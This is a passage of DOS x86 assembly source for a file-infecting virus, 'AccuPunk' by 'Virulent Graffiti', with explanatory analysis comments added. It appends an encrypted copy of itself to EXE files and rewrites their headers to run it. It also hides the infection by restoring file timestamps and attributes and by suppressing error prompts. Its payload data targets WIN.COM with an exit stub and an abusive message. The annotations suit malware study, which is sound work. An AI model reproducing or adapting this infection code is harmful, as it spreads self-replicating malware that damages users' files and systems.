mov ax, 3D00h ; Open File
int 30h
jc bad_exe
xchg ax, bx ; BX = File Handle
mov ax, 5700h ; Get File Date/Time
int 30h
mov ftime, cx ; Save Time
mov fdate, dx ; And Date
mov ah, 3Fh ; Read Header
mov cx, 1ah
mov dx, offset buffer ; Into Buffer
int 30h
call LSeekEnd ; LSeek the End
push dx ; Save File Size
push ax
mov ah, 3Eh ; Close File
int 30h
cmp word ptr [buffer], 'ZM'
jne worse_exe ; Not an EXE File
cmp word ptr [buffer+12h], id_word
jne good_exe ; Not Infected
worse_exe:
pop dx ; Remove Saved File
pop dx ; Size
bad_exe:
jmp remove_locks ; Abort Infection
good_exe:
mov al, 01h ; Overwrite Attribs
xor cx, cx
call attributes
jc worse_exe ; Catch Write-Prot
; Discs Here
push cs
pop es
mov si, offset buffer + 14h ; Save Initial CS:IP
mov di, offset jmpsave ; In Segment
movsw
movsw
sub si, 10 ; Save Initial SS:SP
movsw
movsw
pop ax dx ; Retrive File Size
push ax dx ; Save It
add ax, offset end_write - offset entry
adc dx, 0
mov cx, 512 ; Pages 512 Bytes
div cx
or dx, dx
jz no_round
inc ax ; Rounding Quirk
no_round:
mov word ptr [buffer + 4], ax ; Set Total 512 pages
mov word ptr [buffer + 2], dx ; Set Total mod 512
mov ax, word ptr [buffer + 0Ah] ; Get Minimum
add ax, (end_write - entry)/16 ; Add our Size
mov word ptr [buffer + 0ah], ax ; Put us in Minimum
mov word ptr [buffer + 0ch], ax ; and in the Maximum
pop dx ax ; Retrieve File Size
mov cl, 4
mov bx, word ptr [buffer + 8]
shl bx, cl ; BX = Header Size
sub ax, bx
sbb dx, 0 ; Subtract Header
mov cx, 10h
div cx ; Change To Para/Rem
or dx, dx
jz no_padding
sub cx, dx ; CX = Bytes to Pad
inc ax
no_padding:
push cx ; Save Pad Bytes
sub ax, 10h
mov word ptr [buffer + 14h], offset entry ; Set IP
mov word ptr [buffer + 16h], ax ; Set CS
mov word ptr [buffer + 0Eh], ax ; Set SS
mov word ptr [buffer + 10h], offset end_vir+100h ; Set SP
move_id:
mov word ptr [buffer + 12h], id_word ; Set ID Word
; Negative Checksum
mov ax, 3D02h ; Open File
mov dx, offset fname
int 30h
xchg ax, bx ; BX = File Handle
mov ah, 40h ; Write File
mov cx, 1Ah
mov dx, offset buffer
int 30h
call LSeekEnd ; LSeek to End
pop cx ; Retrieve Padding
cmp cx, 16
je no_fixup ; None Needed
mov ah, 40h ; Write File
int 30h
no_fixup:
mov ah, 2ch ; Get Time
int 21h
mov word ptr [Valu+1], Dx ; New Crypt Valu
mov si, offset writeret ; Copy Write
mov di, offset tempcrypt ; Routine
mov cx, (end_write-writeret)
rep movsb
call tempcrypt ; Call Write Routine
mov ax, 5701h ; Set File Time/Date
mov cx, ftime
mov dx, fdate
int 30h
mov ah, 3Eh ; Close File
int 30h
mov al, 01h ; Reset Attribs
mov cx, fattr
call attributes
jmp remove_locks ; Remove Int 24h
; ---- Identity strings and payload data (analysis notes) ----
; Nothing in this excerpt shows the code that displays win_msg or that
; opens/overwrites WIN.COM; only the data is visible here.
vir_ident db 0,'[DWI] AccuPunk/' ; Virus and Author ident (leading 0 byte, not ASCIIZ-terminated here)
db 'The Attitude Adjuster' ; Idents (continuation of vir_ident)
vir_group db 0,'Virulent Graffiti',0 ; Group Ident (0-terminated)
win_com db 'WIN.COM',0 ; Target File — ASCIIZ name, presumably the payload's overwrite target; confirm against the payload code (not shown)
win_exit db 0cdh, 20h ; DOS Exit — raw encoding of `int 20h` (terminate program); presumably written over WIN.COM so it exits at once
win_msg db 0dh,0ah ; Message — '$'-terminated, i.e. shaped for the DOS AH=09h print call
db 'You''ve been caught, you DWI! You''re nothing ' ; '' = MASM/TASM escape for a single apostrophe
db 'but a Damn Windows Idiot!',0dh,0ah
db 'Well, we at Virulent Graffiti have had it... '
db 'you''re not going to be',0dh,0ah
db 'running that bullshit for a while, ''cuz, hey, '
db 'friends don''t let friends',0dh,0ah
db 'use Windows! (and you''re damn right we''re '
db 'your friends!)',0dh,0ah,'$' ; '$' terminator for AH=09h
;-----------------------------------------------------------------------
; my24 — replacement INT 24h (critical error) handler.
; Installed and removed elsewhere: this file jumps to `remove_locks`,
; commented "Remove Int 24h", and keeps the saved vector in `old24`;
; the install code is not in this excerpt.
; Returning AL=3 tells DOS to FAIL the offending system call — the call
; returns to the program with CF=1 — instead of raising the user-visible
; Abort/Retry/Ignore prompt. That is why the infection code can treat a
; write-protected disk as a plain CF error (`jc worse_exe` after the
; attribute call) without alerting the user.
; NOTE(review): the original comment "Process Terminate" describes AL=2
; (terminate program); AL=3 is "fail system call" (DOS 3.1+).
;-----------------------------------------------------------------------
my24: ; Error Handler
mov al, 3 ; AL=3: fail the system call quietly (not "terminate", which is AL=2)
iret
;-----------------------------------------------------------------------
; Attributes — DOS Get/Set File Attributes (function 43h) on the file
; named by the ASCIIZ buffer `fname`.
; In:   AL = subfunction supplied by the caller (callers in this excerpt
;            pass AL=1 = set; AL=0 would be get),
;       CX = attributes to set (0 to clear read-only before writing,
;            `fattr` to restore afterwards).
; Out:  CF set on error — the write-protect check in the infection code
;       branches on it; CX = current attributes when AL=0.
; Clobbers: AH, DX (plus whatever DOS clobbers).
; NOTE: this file calls DOS through `int 30h` here and in most places,
; but through `int 21h` for the Get-Time call; what makes INT 30h reach
; the DOS dispatcher is not shown in this excerpt — treat it as an
; undocumented entry, not the documented API.
;-----------------------------------------------------------------------
Attributes: ; Get/Set
mov ah, 43h ; DOS fn 43h: get/set file attributes (AL chosen by caller)
mov dx, offset fname ; DS:DX -> ASCIIZ target file name
int 30h ; DOS call via the INT 30h entry (see note above)
ret
;-----------------------------------------------------------------------
; LSeekEnd — DOS Move File Pointer (function 42h), AL=2 = relative to
; end of file, with offset CX:DX = 0, i.e. seek to EOF.
; In:   BX = open file handle.
; Out:  DX:AX = new absolute position = file size in bytes;
;       CF set on error (callers in this excerpt do not check it).
; Clobbers: CX, DX, flags.
; `cwd` sign-extends AX into DX; AX = 4202h is positive, so this is a
; one-byte way of writing `xor dx, dx` without touching AX.
;-----------------------------------------------------------------------
LSeekEnd:
mov ax, 4202h ; AH=42h seek, AL=2 origin = end of file
xor cx, cx ; offset high word = 0
cwd ; DX = 0 (sign of AX is positive) — cheaper than xor dx,dx
int 30h ; DOS call via INT 30h (see note on Attributes)
ret
;-----------------------------------------------------------------------
; WriteRet — scramble the virus body in memory, write it to the target
; file, then unscramble it back in place.
; In:   BX = open target file handle, already positioned at EOF by the
;       caller (LSeekEnd plus any padding write).
; Out:  AX/CF as left by the AH=40h write; the write result is NOT
;       checked — a short or failed write leaves a truncated body in the
;       host with no error path.
; Clobbers: CX, DX, flags. BX survives the two loops via push/pop.
; Key:  the 16-bit word at [Valu+1], patched by the caller from the DX
;       returned by DOS Get Time (fn 2Ch: DH = seconds, DL = hundredths),
;       so the key space is only ~6000 values. `Valu` is not in this
;       excerpt — presumably the immediate of an instruction in the
;       decryptor, which is why the same word is read back here.
; Execution: the caller copies this routine to `tempcrypt` and calls the
; copy. Presumably that is because WriteRet itself lies inside
; [endcrypt, end_write) and would be scrambled underneath itself if run
; in place — `endcrypt` is not visible here, so confirm.
; Transform per 16-bit word: ROL 1, then XOR key. Inverse (second loop):
; XOR key, then ROR 1 — the order must stay mirrored.
; Range: (end_write - endcrypt)/2 words; if that byte length is odd the
; final byte is never scrambled (integer division drops it).
;-----------------------------------------------------------------------
WriteRet:
push bx ; save file handle: BX is reused as the data pointer
mov bx, offset endcrypt ; BX -> first word to scramble (start of encrypted region)
mov cx, (end_write-endcrypt)/2 ; CX = word count (odd trailing byte, if any, is skipped)
mov dx, Word Ptr [Valu+1] ; DX = XOR key patched in by the caller
Crypt_Loop2:
rol word ptr [bx], 1 ; step 1: rotate word left by one
xor word ptr [bx], dx ; step 2: XOR with key
inc bx
inc bx ; next word
loop Crypt_Loop2
pop bx ; restore file handle
mov ah, 40h ; DOS Write File
mov cx, end_write - entry ; byte count = whole body from `entry` to end_write
mov dx, offset entry ; DS:DX -> start of body (clear prefix + scrambled tail)
int 30h ; DOS call via INT 30h; CF/AX not examined
push bx ; save file handle again
mov bx, offset endcrypt ; BX -> start of scrambled region
mov cx, (end_write-endcrypt)/2 ; same word count as above
mov dx, Word Ptr [Valu+1] ; same key
Crypt_Loop3:
xor word ptr [bx], dx ; undo step 2: XOR with key
ror word ptr [bx], 1 ; undo step 1: rotate right by one (original comment said "Left")
inc bx
inc bx ; next word
loop Crypt_Loop3
pop bx ; restore file handle
ret ; body in memory is back to plaintext
; ---- Runtime-only state (analysis notes) ----
; Everything from end_write onward lies past the `end_write - entry` bytes
; that WriteRet copies into the host, so it is never written to disk; in an
; infected host it occupies memory beyond the written image. The header
; patch adds only (end_write - entry)/16 paragraphs to MinAlloc while SP is
; set to end_vir+100h, so whether this area is guaranteed allocated at run
; time is worth confirming against the loader code (not in this excerpt).
end_write: ; end of the bytes written to the target file
old24 dd 0 ; saved INT 24h vector (installed/restored elsewhere; see my24)
buffer db 1Ah dup (0) ; 26-byte EXE header buffer: read, patched, and written back by the infection code
fname db 128 dup (0) ; ASCIIZ target path used by Attributes and the reopen for writing
fdate dw 0 ; original file date, restored after infection to hide the modification
ftime dw 0 ; original file time, restored likewise
fattr dw 0 ; original attributes, restored via Attributes after the write
tempcrypt: ; scratch copy of WriteRet; the caller copies the routine here and calls it
db (end_write-writeret) Dup(0) ; sized to hold WriteRet through end_write
end_vir: ; end of memory image; the patched EXE header sets SP = end_vir+100h
end entry ; program entry point `entry` is defined earlier, outside this excerpt